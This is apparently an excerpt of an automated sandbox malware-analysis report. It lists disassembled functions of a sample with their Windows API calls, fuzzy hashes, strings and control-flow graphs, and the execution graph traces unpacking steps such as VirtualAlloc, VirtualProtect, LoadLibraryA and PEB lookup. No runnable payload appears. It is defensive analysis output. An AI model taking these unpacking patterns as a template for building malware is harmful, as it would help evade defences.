                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                      • String ID:
                                                                      • API String ID: 3103352999-0
                                                                      • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                      • Instruction ID: ccfc59aa31d18cde681723430bd432dafb0f4713ea02d887cacfc68ffbe25ea2
                                                                      • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                      • Instruction Fuzzy Hash: F0E0C234100105678715FBBA9C48ABB32A86E01715B600B2BF865E20F0EBA8D1084AB9
                                                                      APIs
                                                                      • TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                                      • GetLastError.KERNEL32 ref: 00412705
                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00412729
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                      • String ID:
                                                                      • API String ID: 3103352999-0
                                                                      • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                      • Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
                                                                      • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                      • Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C
                                                                      APIs
                                                                      • __startOneArgErrorHandling.LIBCMT ref: 0042F10D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorHandling__start
                                                                      • String ID: pow
                                                                      • API String ID: 3213639722-2276729525
                                                                      • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                      • Instruction ID: 9c0c3c151ae2a5a6b50f0fee57114a4457493f87fddc68121f24b850b116d2d7
                                                                      • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                      • Instruction Fuzzy Hash: 8C515D61B04302D6DB117714E90137BABA0EB54B40FE4597FF491813E9EE3D8CAA9A4F
                                                                      APIs
                                                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,024DB32B,?,00000050,?,?,?,?,?), ref: 024DB1AB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ACP$OCP
                                                                      • API String ID: 0-711371036
                                                                      • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                      • Instruction ID: 7cfee5b3903e7db4b9f82c4805b7770c94765c1e855a3f83edb884f06dcfad5e
                                                                      • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                      • Instruction Fuzzy Hash: 5821B662A00105A6EB268F548D21B9F73AAEF44FDCF4B8126E909D7304F732D941C394
                                                                      APIs
                                                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ACP$OCP
                                                                      • API String ID: 0-711371036
                                                                      • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                      • Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
                                                                      • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                      • Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E
                                                                      APIs
                                                                      • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
                                                                      • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: EncodersGdipImage$Size
                                                                      • String ID: image/png
                                                                      • API String ID: 864223233-2966254431
                                                                      • Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                                      • Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
                                                                      • Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                                      • Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58
                                                                      APIs
                                                                      • SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast
                                                                      • String ID: F(@
                                                                      • API String ID: 1452528299-2698495834
                                                                      • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                      • Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
                                                                      • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                      • Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9
                                                                      APIs
                                                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C554
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ___std_exception_destroy
                                                                      • String ID: F(@$ios_base::failbit set
                                                                      • API String ID: 4194217158-1828034088
                                                                      • Opcode ID: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                                      • Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
                                                                      • Opcode Fuzzy Hash: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                                      • Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog3_catch
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3886170330-2084237596
                                                                      • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                      • Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
                                                                      • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                      • Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE
                                                                      APIs
                                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C
                                                                        • Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
                                                                        • Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE
                                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50
                                                                        • Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
                                                                        • Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                      • String ID: F@
                                                                      • API String ID: 2118720939-885931407
                                                                      • Opcode ID: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                                      • Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
                                                                      • Opcode Fuzzy Hash: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                                      • Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89
                                                                      APIs
                                                                      • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D83
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00428DAA
                                                                        • Part of subcall function 0042860D: RaiseException.KERNEL32(?,?,0040D87E,00000000,00000000,00000000,00000000,?,?,?,?,0040D87E,00000000,0045617C,00000000), ref: 0042866D
                                                                      Strings
                                                                      • Access violation - no RTTI data!, xrefs: 00428D7A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                                                      • String ID: Access violation - no RTTI data!
                                                                      • API String ID: 2053020834-2158758863
                                                                      • Opcode ID: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
                                                                      • Instruction ID: 6523df8e39b2e501409064d37ec9e65ca05e1b8799177bf407a1bfc54a05c872
                                                                      • Opcode Fuzzy Hash: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
                                                                      • Instruction Fuzzy Hash: 28E0DF726993185A9A04D6A1B846CDE73EC9E24300BA0001FF900920C2EE2DF918826D
                                                                      APIs
                                                                      • Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ContextInternal$BaseBase::~Concurrency::details::
                                                                      • String ID: zB$~B
                                                                      • API String ID: 3275300208-395995950
                                                                      • Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                      • Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
                                                                      • Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                      • Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC
                                                                      APIs
                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004212E9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                      • String ID: pThreadProxy
                                                                      • API String ID: 1687795959-3651400591
                                                                      • Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                                      • Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
                                                                      • Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                                      • Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,024A2AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,024A2AAD,00000000), ref: 024CB187
                                                                      • GetLastError.KERNEL32 ref: 024CB195
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,024A2AAD,00000000), ref: 024CB1F0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1717984340-0
                                                                      • Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                      • Instruction ID: 861b1b4a421ea4c90b5d9cc975b66958b543267c0326059490cc64bbaba1c925
                                                                      • Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                      • Instruction Fuzzy Hash: 3841E738600206AFCB618F6DC84A76F7BB5EF41758F34816EE8599B3A4DB308901CB60
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
                                                                      • GetLastError.KERNEL32 ref: 0042AF2E
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1717984340-0
                                                                      • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                      • Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
                                                                      • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                      • Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A

                                                                      Execution Graph

                                                                      Execution Coverage:1.3%
                                                                      Dynamic/Decrypted Code Coverage:40.5%
                                                                      Signature Coverage:12.2%
                                                                      Total number of Nodes:74
                                                                      Total number of Limit Nodes:5
                                                                      execution_graph 25998 43aa80 26001 43d810 25998->26001 26000 43aa8a RtlAllocateHeap 26002 43d830 26001->26002 26002->26000 26002->26002 26003 40c583 CoInitializeSecurity 26004 43aaa0 26005 43aab3 26004->26005 26006 43aac4 26004->26006 26007 43aab8 RtlFreeHeap 26005->26007 26007->26006 26008 43c767 26010 43c790 26008->26010 26009 43c80e 26010->26009 26012 43c1f0 LdrInitializeThunk 26010->26012 26012->26009 26013 43cce6 26014 43cd00 26013->26014 26016 43cd6e 26014->26016 26020 43c1f0 LdrInitializeThunk 26014->26020 26019 43c1f0 LdrInitializeThunk 26016->26019 26018 43ce4d 26019->26018 26020->26016 26021 43c58a 26023 43c460 26021->26023 26022 43c5f4 26023->26022 26026 43c1f0 LdrInitializeThunk 26023->26026 26025 43c54d 26026->26025 26027 43c2c8 26028 43c2e0 26027->26028 26028->26028 26029 43ccaf GetForegroundWindow 26028->26029 26030 43ccbe 26029->26030 26031 999735 26032 99973e 26031->26032 26035 99990e 26032->26035 26036 99991d 26035->26036 26039 99a0ae 26036->26039 26040 99a0c9 26039->26040 26041 99a0d2 CreateToolhelp32Snapshot 26040->26041 26042 99a0ee Module32First 26040->26042 26041->26040 26041->26042 26043 99a0fd 26042->26043 26044 99990d 26042->26044 26046 999d6d 26043->26046 26047 999d98 26046->26047 26048 999da9 VirtualAlloc 26047->26048 26049 999de1 26047->26049 26048->26049 26049->26049 26050 408850 26052 40885f 26050->26052 26051 408acf ExitProcess 26052->26051 26053 40891c GetCurrentProcessId GetCurrentThreadId 26052->26053 26056 408ab3 26052->26056 26054 408941 26053->26054 26055 408945 SHGetSpecialFolderPathW GetForegroundWindow 26053->26055 26054->26055 26057 408a3d 26055->26057 26056->26051 26057->26056 26059 40c550 CoInitializeEx 26057->26059 26060 43e7d0 26062 43e800 26060->26062 26061 43e94e 26064 43e87f 26062->26064 26066 43c1f0 LdrInitializeThunk 26062->26066 26064->26061 26067 43c1f0 LdrInitializeThunk 26064->26067 26066->26064 26067->26061 26068 8f003c 26069 8f0049 26068->26069 26083 8f0e0f SetErrorMode SetErrorMode 26069->26083 26074 8f0265 26075 8f02ce VirtualProtect 26074->26075 26077 8f030b 26075->26077 26076 8f0439 VirtualFree 26081 8f05f4 LoadLibraryA 26076->26081 26082 8f04be 26076->26082 26077->26076 26078 8f04e3 LoadLibraryA 26078->26082 26080 8f08c7 26081->26080 26082->26078 26082->26081 26084 8f0223 26083->26084 26085 8f0d90 26084->26085 26086 8f0dad 26085->26086 26087 8f0dbb GetPEB 26086->26087 26088 8f0238 VirtualAlloc 26086->26088 26087->26088 26088->26074 26094 40e71a CoUninitialize CoUninitialize

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCurrentProcessId.KERNEL32 ref: 0040891C
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00408925
                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004089DB
                                                                      • GetForegroundWindow.USER32 ref: 00408A33
                                                                        • Part of subcall function 0040C550: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
                                                                        • Part of subcall function 0040B390: FreeLibrary.KERNEL32(00408AB8), ref: 0040B396
                                                                        • Part of subcall function 0040B390: FreeLibrary.KERNEL32 ref: 0040B3B7
                                                                      • ExitProcess.KERNEL32 ref: 00408AD1
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                      • String ID:
                                                                      • API String ID: 3072701918-0
                                                                      • Opcode ID: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
                                                                      • Instruction ID: 4e8ceca9db94e69365d2c2d7f1aefafb9de861df3649afd20bfce81a3928f3be
                                                                      • Opcode Fuzzy Hash: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
                                                                      • Instruction Fuzzy Hash: 9351A9BBF102180BD71CAEAACD463A675878BC5710F1F813E5985EB7D6EDB88C0142C9

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 144 43c1f0-43c222 LdrInitializeThunk
                                                                      APIs
                                                                      • LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                      • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                      • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                      • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_E093.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,+*)
                                                                      • API String ID: 0-3529585375
                                                                      • Opcode ID: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
                                                                      • Instruction ID: 95b520c28a51d7a8debe208fb8c6725e065a55489a7142fefcc330b3f2274472
                                                                      • Opcode Fuzzy Hash: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
                                                                      • Instruction Fuzzy Hash: 7331A539B402119BEB18CF58CCD1BBEB7B2BB49301F249129D501B7390CB75AD018B58

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 8f003c-8f0047 1 8f004c-8f0263 call 8f0a3f call 8f0e0f call 8f0d90 VirtualAlloc 0->1 2 8f0049 0->2 17 8f028b-8f0292 1->17 18 8f0265-8f0289 call 8f0a69 1->18 2->1 20 8f02a1-8f02b0 17->20 22 8f02ce-8f03c2 VirtualProtect call 8f0cce call 8f0ce7 18->22 20->22 23 8f02b2-8f02cc 20->23 29 8f03d1-8f03e0 22->29 23->20 30 8f0439-8f04b8 VirtualFree 29->30 31 8f03e2-8f0437 call 8f0ce7 29->31 33 8f04be-8f04cd 30->33 34 8f05f4-8f05fe 30->34 31->29 36 8f04d3-8f04dd 33->36 37 8f077f-8f0789 34->37 38 8f0604-8f060d 34->38 36->34 42 8f04e3-8f0505 LoadLibraryA 36->42 40 8f078b-8f07a3 37->40 41 8f07a6-8f07b0 37->41 38->37 43 8f0613-8f0637 38->43 40->41 45 8f086e-8f08be LoadLibraryA 41->45 46 8f07b6-8f07cb 41->46 47 8f0517-8f0520 42->47 48 8f0507-8f0515 42->48 44 8f063e-8f0648 43->44 44->37 50 8f064e-8f065a 44->50 56 8f08c7-8f08f9 45->56 51 8f07d2-8f07d5 46->51 49 8f0526-8f0547 47->49 48->49 54 8f054d-8f0550 49->54 50->37 55 8f0660-8f066a 50->55 52 8f07d7-8f07e0 51->52 53 8f0824-8f0833 51->53 57 8f07e4-8f0822 52->57 58 8f07e2 52->58 62 8f0839-8f083c 53->62 59 8f0556-8f056b 54->59 60 8f05e0-8f05ef 54->60 61 8f067a-8f0689 55->61 63 8f08fb-8f0901 56->63 64 8f0902-8f091d 56->64 57->51 58->53 65 8f056f-8f057a 59->65 66 8f056d 59->66 60->36 67 8f068f-8f06b2 61->67 68 8f0750-8f077a 61->68 62->45 69 8f083e-8f0847 62->69 63->64 70 8f057c-8f0599 65->70 71 8f059b-8f05bb 65->71 66->60 72 8f06ef-8f06fc 67->72 73 8f06b4-8f06ed 67->73 68->44 74 8f084b-8f086c 69->74 75 8f0849 69->75 83 8f05bd-8f05db 70->83 71->83 77 8f06fe-8f0748 72->77 78 8f074b 72->78 73->72 74->62 75->45 77->78 78->61 83->54
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 008F024D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_8f0000_E093.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: cess$kernel32.dll
                                                                      • API String ID: 4275171209-1230238691
                                                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                      • Instruction ID: 2f5da39f9660e2635b7f9a5d6ff00d7d5a8da7f531bdff6610be31206e02b5b0
                                                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                      • Instruction Fuzzy Hash: 40526974A01229DFDB64CF68C984BA8BBB1BF09304F1480D9E54DAB352DB30AE95DF15

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 119 99a0ae-99a0c7 120 99a0c9-99a0cb 119->120 121 99a0cd 120->121 122 99a0d2-99a0de CreateToolhelp32Snapshot 120->122 121->122 123 99a0ee-99a0fb Module32First 122->123 124 99a0e0-99a0e6 122->124 125 99a0fd-99a0fe call 999d6d 123->125 126 99a104-99a10c 123->126 124->123 129 99a0e8-99a0ec 124->129 130 99a103 125->130 129->120 129->123 130->126
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0099A0D6
                                                                      • Module32First.KERNEL32(00000000,00000224), ref: 0099A0F6
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2679002116.0000000000999000.00000040.00000020.00020000.00000000.sdmp, Offset: 00999000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_999000_E093.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                      • String ID:
                                                                      • API String ID: 3833638111-0
                                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                      • Instruction ID: 417d66b3678ede5a7a371dff5cdd877b9951e192a6353b38649cabd11ae7f84e
                                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                      • Instruction Fuzzy Hash: 2CF062321007157BDB202ABDA88DB6E76ECEF4A724F100528E646D14C0DBB4EC454AA6

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 132 8f0e0f-8f0e24 SetErrorMode * 2 133 8f0e2b-8f0e2c 132->133 134 8f0e26 132->134 134->133
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00000400,?,?,008F0223,?,?), ref: 008F0E19
                                                                      • SetErrorMode.KERNELBASE(00000000,?,?,008F0223,?,?), ref: 008F0E1E
                                                                      Memory Dump Source
